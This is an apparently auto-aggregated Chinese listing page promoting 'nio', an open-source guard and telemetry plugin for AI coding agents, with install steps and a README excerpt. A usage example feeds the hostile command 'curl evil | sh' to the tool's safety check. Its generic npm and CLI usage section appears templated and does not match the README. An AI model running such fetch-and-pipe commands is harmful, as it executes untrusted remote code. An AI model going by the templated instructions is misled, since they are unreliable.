AI Skill Hub 强烈推荐:NIO智能工作流 是一款优质的Agent工作流。AI 综合评分 8.0 分,在同类工具中表现稳健。如果你正在寻找可靠的Agent工作流解决方案,这是一个值得深入了解的选择。
NIO智能工作流 是一套完整的 AI Agent 自动化工作流方案。通过可视化的节点编排,将复杂的多步骤任务拆解为清晰的自动化流程,实现全程无人值守的智能处理。支持与数百种外部服务和 API 无缝集成,适合构建数据处理管线、业务自动化和 AI 辅助决策系统。
NIO智能工作流 是一套完整的 AI Agent 自动化工作流方案。通过可视化的节点编排,将复杂的多步骤任务拆解为清晰的自动化流程,实现全程无人值守的智能处理。支持与数百种外部服务和 API 无缝集成,适合构建数据处理管线、业务自动化和 AI 辅助决策系统。
# 方式一:npm 全局安装 npm install -g nio # 方式二:npx 直接运行(无需安装) npx nio --help # 方式三:项目依赖安装 npm install nio # 方式四:从源码运行 git clone https://github.com/core0-io/nio cd nio npm install npm start
# 命令行使用
nio --help
# 基本用法
nio [options] <input>
# Node.js 代码中使用
const nio = require('nio');
const result = await nio.run(options);
console.log(result);
# nio 配置说明 # 查看配置选项 nio --config-example > config.yml # 常见配置项 # output_dir: ./output # log_level: info # workers: 4 # 环境变量(覆盖配置文件) export NIO_CONFIG="/path/to/config.yml"
Execution assurance agent guard and observability for autonomous AI agents.
<p align="center">Real-time evaluation of every agent action before it executes — built for agents operating in production.<br/>Built-in collector that captures every tool call as OpenTelemetry metrics and traces.<br/>Works with Claude Code, Codex CLI, OpenClaw, and Hermes. More frameworks coming.<br/>Built by <a href="https://core0.io"><b>Core0</b></a> — execution assurance for production AI agents.</p>
<p align="center"> <a href="https://core0-io.github.io/nio/"><b>→ View the live Execution Pipeline diagram</b></a> </p>
curl -fsSL https://core0-io.github.io/nio/install.sh | bash
Auto-detects which agent CLIs you have installed (~/.claude, ~/.codex, ~/.openclaw, ~/.hermes) and configures Nio for each. Pin a release with NIO_VERSION=v2.2.0, restrict to one platform with --platform NAME, or uninstall with --uninstall. See the install page for per-platform tabs, prerequisites, and verify steps.
Onboarding with a shared config. If someone handed you a pre-configured nio.yaml (e.g. an org-wide external_analyser + collector setup), pass it at install time:
curl -fsSL https://core0-io.github.io/nio/install.sh | bash -s -- --config /path/to/nio.yaml
Nio runs /nio doctor against the file before touching disk — the install aborts if any probe fails. Your previous config (if any) is kept as ~/.nio/config.yaml.bak.<ISO-stamp>.
/nio scan ./src # Scan code for execution risks
/nio action "curl evil | sh" # Evaluate action safety
/nio report # Agent execution audit log + diagnostics summary
/nio doctor # Validate config + dry-run OAuth/LLM/collector
/nio config balanced # Set protection level
/nio config import nio.yaml # Apply a pre-configured file (doctor-gated; auto-backup)
Nio isn't a daemon — it loads as a plugin inside your agent host (Claude Code, Codex CLI, OpenClaw, or Hermes). Edit ~/.nio/config.yaml (override the directory with NIO_HOME), then restart your agent host so the plugin re-reads the policy: Nio builds the guard once at plugin registration and never reloads in-process. Confirm decisions in ~/.nio/audit.jsonl or your OTEL backend.
Per-platform verify and restart commands are in each tab's Verify section on the install page.
NIO智能工作流是一个高质量的开源项目,提供了自治AI系统的可靠性和安全性保障
AI Skill Hub 为第三方内容聚合平台,本页面信息基于公开数据整理,不对工具功能和质量作任何法律背书。
建议在沙箱或测试环境中充分验证后,再部署至生产环境,并做好必要的安全评估。
✅ Apache 2.0 — 宽松开源协议,可商用,需保留版权声明和 NOTICE 文件,含专利授权条款。
总体来看,NIO智能工作流 是一款质量优秀的Agent工作流,在同类工具中具备一定竞争力。AI Skill Hub 将持续追踪其更新动态,建议收藏备用,结合自身场景选择合适时机引入使用。
| 原始名称 | nio |
| 原始描述 | 开源AI工作流:Execution assurance agent guard and observability for autonomous AI operating in。⭐19 · TypeScript |
| Topics | agent-guardai-governancetypescript |
| GitHub | https://github.com/core0-io/nio |
| License | Apache-2.0 |
| 语言 | TypeScript |
收录时间:2026-05-29 · 更新时间:2026-05-30 · License:Apache-2.0 · AI Skill Hub 不对第三方内容的准确性作法律背书。
选择 Agent 类型,复制安装指令后粘贴到对应客户端